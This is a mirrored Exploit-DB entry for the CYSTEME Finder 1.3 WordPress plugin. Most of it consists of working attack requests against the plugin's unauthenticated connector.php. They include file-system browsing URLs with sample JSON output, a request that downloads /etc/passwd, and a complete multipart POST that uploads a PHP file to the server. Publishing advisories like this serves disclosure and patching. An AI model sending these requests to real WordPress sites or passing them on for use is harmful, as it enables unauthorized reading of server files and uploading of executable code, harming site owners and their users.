WordPress Plugin CYSTEME Finder 1.3 – Arbitrary File Disclosure/Arbitrary File Upload

• Exploit Database
• 108 阅读

• 作者： T0w3ntum
  日期： 2016-08-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40295/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120

  Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload Link: https://wordpress.org/plugins/cysteme-finder/ Version: 1.3 Date: August 23rd 2016 Exploit Author: T0w3ntum Author Website: t0w3ntum.com   ### SUMMARY   CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request to http://server/wp-content/plugins/cysteme-finder/php/connector.php   This allows attackers to upload, download, and browse the remote file system.   ### LFI   - Retrieve all data in the root wordpress directory. This will return JSON. Exploit: http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1   Reply: { "cwd": { "mime": "directory", "ts": 1471999484, "read": 1, "write": 1, "size": 0, "hash": "l1_Lw", "volumeid": "l1_", "name": "Fichiers du site", "date": "Today 20:44", "locked": 1, "dirs": 1 }, "options": { "path": "Fichiers du site", "url": null, "tmbUrl": "", "disabled": [   ], "separator": "\/", "copyOverwrite": 1, "archivers": { "create": [ "application\/x-tar", "application\/x-gzip", "application\/x-bzip2" ], "extract": [ "application\/x-tar", "application\/x-gzip", "application\/x-bzip2", "application\/zip" ] } }, "files": [ { "mime": "directory", "ts": 1471999484, "read": 1, "write": 1, "size": 0, "hash": "l1_Lw", "volumeid": "l1_", "name": "Fichiers du site", "date": "Today 20:44", "locked": 1, "dirs": 1 }, { "mime": "text\/plain", "ts": 1471714510, "read": 1, "write": 1, "size": 813, "hash": "l1_Lmh0YWNjZXNz", "name": ".htaccess", "phash": "l1_Lw", "date": "20 Aug 2016 13:35" },   Simply replacing wphome with any other directory path will return file information for that directory. If you want to download that file, get the hash value for the file and include it in the following request: Will download /etc/passwd http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1   ### File Upload   As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following.   POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1 Host: http://server Content-Length: 314 Origin: http://server User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Type: multipart/form-data; boundary=--------723608748 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close   ----------723608748 Content-Disposition: form-data; name="cmd"   upload ----------723608748 Content-Disposition: form-data; name="target"   l1_Lw ----------723608748 Content-Disposition: form-data; name="upload[]"; filename="test.php" Content-Type: text/html   <?php phpinfo(); ?> ----------723608748--